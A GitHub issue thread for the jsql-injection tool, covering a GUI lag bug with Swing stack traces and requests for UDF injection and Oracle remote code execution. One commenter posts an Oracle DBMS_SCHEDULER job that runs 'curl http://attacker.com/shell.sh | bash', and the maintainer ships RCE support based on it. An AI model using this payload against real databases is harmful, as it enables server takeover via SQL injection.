### ISSUE TITLE
lag jsql cause annonying massage

### ISSUE THREAD

**Issue by mrdragonblack** [ron190/jsql-injection#95815]
jsql cause lag and anonying massage is coming 

after jsql found sql injection jsql is lag and anonying massage is coming 

yeah i have sample of log and i take it from windows cmd look 

## Steps to reproduce the problem ?:?]
        at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:742) ~[?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) [?:?]
        at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) [?:?]
2024-12-21 18:43:36,916 ERROR [from ForkJoinPool.commonPool-worker-2] util.ExceptionUtil$ExceptionHandler (ExceptionUtil.java:50) - Unhandled Exception on from ForkJoinPool.commonPool-worker-2
java.lang.IllegalArgumentException: TextHitInfo is out of range
        at java.desktop/java.awt.font.TextLayout.checkTextHit(TextLayout.java:776) ~[?:?]
        at java.desktop/java.awt.font.TextLayout.getCaretInfo(TextLayout.java:1216) ~[?:?]
        at java.desktop/java.awt.font.TextLayout.getCaretInfo(TextLayout.java:1318) ~[?:?]
        at java.desktop/javax.swing.text.GlyphPainter2.getSpan(GlyphPainter2.java:82) ~[?:?]
        at java.desktop/javax.swing.text.GlyphView.getPartialSpan(GlyphView.java:323) ~[?:?]
        at java.desktop/javax.swing.text.GlyphView.getMinimumSpan(GlyphView.java:550) ~[?:?]
        at java.desktop/javax.swing.text.ParagraphView.calculateMinorAxisRequirements(ParagraphView.java:716) ~[?:?]
        at java.desktop/javax.swing.plaf.basic.BasicTextAreaUI$PlainParagraph.calculateMinorAxisRequirements(BasicTextAreaUI.java:272) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.checkRequests(BoxView.java:936) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.getMinimumSpan(BoxView.java:569) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.calculateMinorAxisRequirements(BoxView.java:904) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.checkRequests(BoxView.java:936) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(BoxView.java:344) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.layout(BoxView.java:709) ~[?:?]
        at java.desktop/javax.swing.text.BoxView.setSize(BoxView.java:398) ~[?:?]
        at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(BasicTextUI.java:1823) ~[?:?]
        at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(BasicTextUI.java:943) ~[?:?]
        at java.desktop/javax.swing.plaf.basic.BasicTextAreaUI.getPreferredSize(BasicTextAreaUI.java:121) ~[?:?]
        at java.desktop/javax.swing.JComponent.getPreferredSize(JComponent.java:1734) ~[?:?]
        at java.desktop/javax.swing.JTextArea.getPreferredSize(JTextArea.java:623) ~[?:?]
        at java.desktop/javax.swing.ViewportLayout.layoutContainer(ViewportLayout.java:148) ~[?:?]
        at java.desktop/java.awt.Container.layout(Container.java:1541) ~[?:?]
        at java.desktop/java.awt.Container.doLayout(Container.java:1530) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1725) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validateTree(Container.java:1734) ~[?:?]
        at java.desktop/java.awt.Container.validate(Container.java:1660) ~[?:?]
        at java.desktop/javax.swing.RepaintManager$3.run(RepaintManager.java:757) ~[?:?]
        at java.desktop/javax.swing.RepaintManager$3.run(RepaintManager.java:755) ~[?:?]
        at java.base/java.security.AccessController.doPrivileged(AccessController.java:400) ~[?:?]
        at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:87) ~[?:?]
        at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(RepaintManager.java:754) ~[?:?]
        at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(RepaintManager.java:1896) ~[?:?]
        at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318) ~[?:?]
        at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:773) ~[?:?]
        at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:720) ~[?:?]
        at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:714) ~[?:?]
        at java.base/java.security.AccessController.doPrivileged(AccessController.java:400) ~[?:?]
        at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:87) ~[?:?]
 and this is  happen in linux 
  1. first i want to inject site for pentest and i found strange massage and it cause lag in jsql 
  2. and the log just like  at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:742) ~[?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) [?:?]
        at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) [?:?]
        at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) [?:?]
2024-12-21 18:43:37,096 ERROR [from ForkJoinPool.commonPool-worker-2] util.ExceptionUtil$ExceptionHandler (ExceptionUtil.java:50) - Unhandled Exception on from ForkJoinPool.commonPool-worker-2
java.lang.IllegalArgumentException: TextHitInfo is out of range
it so annoying 

## [Community] Request for new feature
please fix this bug  and please add udf injection in mysql and for portgresql and add shellcode creation for post exploit like sqlmap thank you sorry about bad english im from indonesia  your project it so good while sqlmap not detect this sql injection but your tool detect the sql injection thank you 
![Screenshot (332)](https://github.com/user-attachments/assets/3972a73d-da50-4762-9ccd-d58e70c0bc66)

**Comment by ron190** [comment]
@mrdragonblack From the stacktrace it seems that the java swing GUI is not painting components properly, but as far as what I can see on the stacktrace there's no reference to jsql classpath.

You can verify in a full complete stacktrace if there's any reference to jsql classpath like this:
```java
...
at java.desktop/javax.swing.JOptionPane.showConfirmDialog(JOptionPane.java:729)
at com.jsql.view.swing.panel.address.ActionStart.startInjection(ActionStart.java:50) 👈
at com.jsql.view.swing.panel.address.ActionEnterAddressBar.actionPerformed(ActionEnterAddressBar.java:18) 👈
at java.desktop/javax.swing.JTextField.fireActionPerformed(JTextField.java:525)
...
```

In case there's no reference to jsql then various root causes can generate similar issues :
- OS problem, are you using an uncommon Linux distribution ? have you tried on another OS ?
- desktop system problem, are you using an uncommon Linux desktop ?
- java runtime, check the version of your jdk using `java -version` and retry on another jdk

**Comment by ron190** [comment]
@mrdragonblack UDF for mysql released in [v0.105](https://github.com/ron190/jsql-injection/releases/tag/v0.105), UDF for postgres ongoing, thanks for the idea.

**Comment by selectfromblackhydra** [comment]
udf injection is important 
to gain command or admin priv without inject additional  data and udf inject need stack query 
oh one thing can you add oracle os command RCE

**Comment by selectfromblackhydra** [comment]
no man this is not about udf but this is about can  you add from sql injection to RCE here this example code BEGIN
   DBMS_SCHEDULER.CREATE_JOB(
      job_name        => 'rce_job',
      job_type        => 'EXECUTABLE',
      job_action      => '/bin/bash -c "curl http://attacker.com/shell.sh | bash"',
      start_date      => SYSTIMESTAMP,
      repeat_interval => NULL,
      end_date        => NULL,
      enabled         => TRUE
   );
END;

**Comment by ron190** [comment]
I see the idea, nice one again.

I did some tests but it's not working on my container, I tried really basic commands like `job_action => 'echo hello > test.log'` and `job_action => 'create-a-simple-file.sh'`, but no success so maybe a write permission issue.

But I confirm that `curl` is available in the container 🤦

Actually some aspects are not clear to me and it would require more local testing, and also more understanding about how the RCE could interact with jSQL and its integrated terminal, not limited to : 
- what is the `.sh` doing ?
- how to do local testing and validation ?
- running a tiny server from jSQL to deliver the `.sh` is possible, but needed ?

**Comment by selectfromblackhydra** [comment]
maybe you can see this link for oracle injection and RCE oracle injection  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md

**Comment by selectfromblackhydra** [comment]
why i want oracle injection because i have oracle database with admin priv with stack query but sqlmap not have os RCE in oracle

**Comment by selectfromblackhydra** [comment]
can telling me why time based oracle is missing Strategy [Time] for [Oracle]  is missing

**Comment by ron190** [comment]
@selectfromblackhydra RCE for oracle released in [v0.106](https://github.com/ron190/jsql-injection/releases/tag/v0.106).

Validation on container oracle v19 worked, though it can be difficult to make it work :
- Requires stack query
- Uses currently the `SYS` user, I may adapt the exploit for username input
- GET is fine, so it should work also with other methods like POST

Some optimization are possible, I'll review again the implementation to compress the java code.

Thanks again for the resource and the idea. I'm interested in integrating other techniques similar to RCE and UDF that I can validate on my setup, whatever the rdbms and the version.

Indeed, testing and reviewing the code and the payloads is important to make it robust, so anyone into this topic is also welcome.

### RCE terminal working on oracle :

![Image](https://github.com/user-attachments/assets/d77c9569-e31c-4870-84b7-ec7e1571a066)
